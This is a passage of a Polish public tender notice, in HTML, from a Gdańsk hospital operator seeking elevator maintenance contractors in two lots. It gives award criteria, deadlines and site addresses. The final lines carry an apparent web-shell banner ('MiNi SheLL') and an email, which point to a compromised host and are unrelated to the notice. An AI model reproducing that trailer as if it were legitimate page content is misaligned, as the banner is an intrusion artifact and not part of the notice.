-   zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 
3. Wykonawca ma obowiązek złożyć dokumenty w oryginałach lub w kopiach opatrzonych napisem <Za zgodność z oryginałem> i podpisem osoby lub osób umocowanych do reprezentacji wykonawcy. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w ust. 2, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
4. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
5. Dokumenty stanowiące ofertę:
5.1 Formularz oferty  
5.2. Formularz cenowy
5.2 Oświadczenia i dokumenty wymagane w Rozdział IX ust. 1.        
Forma dokumentów - zgodnie z zapisem Rozdział IX ust. 3 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - czas reakcji od chwili zgłoszenia awarii - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zawarte w projekcie umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.copernicus.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.copernicus.gda.pl lub Zamawiający: Działa Zamówień Publicznych, Al. Jana Pawła II 50, pok. 093.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2015 godzina 10:00, miejsce: Sekretariat Prezesa Copernicus Podmiotu Leczniczego Sp. z o.o. tj. Szpitala im. św. Wojciecha Al. Jana Pawła II 50, Gdańsk. (pokój 44).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymania w zdolności techniczno-eksploatacyjnej i ruchowej dźwigów (wind) D10.251.61.T.2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. PAKIET I - obejmuje konserwację 29 dźwigów w okresie 39  miesięcy w obiektach:
-	Gdańsk, ulica Nowe Ogrody 1/6,
- 	Gdańsk, ulica Powstańców Warszawskich 1-2.
Szczegółowy wykaz urządzeń wymieniono w załączniku AI do SIWZ stanowiącym odpowiednio załącznik nr 1 do umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.75.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. czas reakcji od chwili zgoszenia awarii - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymania w zdolności techniczno-eksploatacyjnej i ruchowej dźwigów (wind) D10.251.61.T.2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. PAKIET II - obejmuje konserwację 18 dźwigów w okresie 36 miesięcy w obiektach:
-	Gdańsk, Aleja Jana Pawła II 50,
-	Gdańsk, ulica Majewskich 22,
-	Gdańsk, ulica Jakuba Wejhera 12.
	Szczegółowy wykaz urządzeń wymieniono w załączniku  AII do SIWZ 	stanowiącym odpowiednio załącznik nr 1 do umowy ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.75.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. czas reakcji od chwili zgłoszenia awarii - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com